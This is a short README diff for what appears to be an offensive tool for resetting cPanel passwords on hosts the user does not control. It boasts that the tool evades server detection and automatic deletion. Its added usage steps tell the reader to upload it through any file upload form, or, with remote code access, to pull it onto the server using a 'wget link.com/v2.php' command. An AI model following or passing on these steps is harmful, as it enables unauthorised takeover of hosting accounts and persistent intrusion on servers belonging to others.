naufalardhani/cpanel-pass-reset/README.md

 # What are the advantages?
 - Can be uploaded to the server without bypass
 - It will not be deleted automatically by the server

+# How to usage
+- You can upload this tool via any file upload form and access it!
+- If you have a remote code access, you can write command like this 'wget link.com/v2.php'